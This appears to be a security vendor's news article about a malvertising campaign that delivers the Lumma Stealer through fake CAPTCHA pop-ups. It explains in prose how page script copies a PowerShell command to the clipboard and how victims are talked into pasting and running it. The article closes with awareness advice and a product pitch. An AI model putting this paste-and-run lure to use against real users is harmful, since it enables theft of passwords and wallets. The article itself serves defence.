An ongoing malvertising campaign is proving effective at distributing a dangerous information stealer malware called Lumma Stealer using fake CAPTCHA prompts that appear when users browse the web.
Lumma Stealer is offered under the malware-as-a-service model, where cybercriminals can pay to use the malware rather than having to develop their own. The malware has extensive stealing capabilities and will obtain browsing histories, passwords, and cryptocurrency wallet details. That information is then sent to the attacker’s command and control server and is abused directly or sold on. The fake CAPTCHA pages generated in this malvertising campaign will be familiar to web users, as they are present on many websites, even Google uses them to verify that a user is a human rather than a bot. In this case, the fake CAPTCHA uses images rather than text, which the user must click based on the prompt. The user is told to click on images of legitimate advertisements and after selecting the advertisements and clicking verify, they will be tricked into executing a PowerShell command that will deliver Lumma Stealer from a remote server.
A variety of popup ads are used in this campaign to appeal to a broad audience, including streaming services, software sites, and fake offers, all designed to attract a click. Code embedded in the ad will perform a check to determine if the user is a person, and if that check is passed, the fake CAPTCHA is displayed. The CAPTCHA page includes JavaScript that silently copies a one-line PowerShell command to the clipboard.
As part of the verification check, the user will be presented with a Verification Steps pop-up that instructs them to press the Windows button + the R key, then press CTRL + V, and then press enter on their keyboard. Anyone with a reasonable knowledge of computers will be aware that the first step will launch the Windows Run Dialog box which is used to quickly run programs. CTRL + V is a keyboard shortcut for pasting, and enter will run that pasted command. Since JavaScript has added the PowerShell command to the clipboard, following those steps will run the PowerShell command and trigger the download and execution of Lumma Stealer.
Malvertising campaigns involve adding malicious adverts to third-party ad networks, which are used by a huge number of legitimate websites for generating additional revenue. Advertisers pay to have their adverts displayed on any website that has the ad network’s code. Many high-traffic legitimate sites such as media sites use these adverts, so the advertisers can reach a huge number of people. This campaign, which was analyzed by Guardio Labs/Infoblox, was linked to a single ad network – Monetag. The advantage of that ad network is it allows pop-ups to be displayed, and code can be incorporated to allow those pop-ups to be displayed even if the user has an ad blocker. All ad networks have moderation processes to verify that the ads being displayed are legitimate and not malicious; however, the threat actor has cleverly managed to circumvent moderation processes, thus ensuring their ads get millions of impressions.
Anyone browsing the web will have seen adverts displayed through ad networks, and avoiding these ads online is virtually impossible. As this campaign shows, even ad blockers are not always effective. To combat malvertising, businesses should ensure that they cover this tactic in their security awareness training content. Employees should be made aware of the threat and be told never to click on ads, popups, nor to execute any commands when prompted to do so on a website or by an ad.
Creating new training content is easy with the SafeTitan security awareness training platform from TitanHQ. The platform has a huge number of training modules, allowing businesses to easily create custom training programs for different roles, based on the types of threats they are likely to encounter, including malvertising threats.
A web filter is also strongly recommended for blocking access to malicious websites and controlling the sites that users can access, in particular sites offering pirated software as the ad networks used by these sites tend to have fewer controls on the advertisers that can use them, increasing the chance of malicious adverts being displayed.